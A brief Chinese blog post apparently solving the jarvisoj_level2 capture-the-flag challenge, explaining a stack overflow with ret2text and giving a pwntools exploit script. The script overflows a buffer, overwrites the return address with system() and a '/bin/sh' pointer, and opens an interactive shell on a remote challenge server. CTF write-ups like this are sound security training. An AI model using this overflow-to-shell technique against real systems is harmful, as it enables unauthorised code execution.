pwn | jarvisoj_level2
jarvisoj_level2
简单栈溢出rop ret2text
存在system和binsh字符串
直接丢exp:
from pwn import *
context.log_level = 'debug'
# sh = process('./level2')
sh = remote('node4.buuoj.cn', 29799)
p_binsh = 0x804a024
# p_system = 0x804849e
p_system = 0x8048320
sh.recv()
# retaddr retaddr2 argv0
payload = 0x88 * b'm' + 4 * b'z' + p32(p_system) + b'Mz11' + p32(p_binsh)
sh.sendline(payload)
sh.interactive()
sh.close()
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/15568726.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com